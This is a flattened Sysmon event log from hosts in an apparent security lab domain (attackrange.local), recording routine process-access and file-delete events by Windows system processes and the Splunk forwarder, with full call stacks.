07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001048354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.568{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0264472556B328E70EF6B59DFA299DC1,SHA256=E7717DD9A5BA0AF5D43BD8A131E7FC66944918F4EA8934845F18800A648086F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:36.040{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D8AB265B427CF9079B0BCBAA36B716B,SHA256=4899F171C80010CE5CE61CD61718F2A6C0EA8461DBC24B83B1CAB1C596B1E1EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.530{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D498827454FA836F4D977F5BD6F7B22E,SHA256=EF74CE8DFA675F007256562F2296286AB07C918859E9AEEBF5B41861A8B224AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.283{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.283{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.283{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.283{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.230{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.230{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.230{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.230{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.230{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 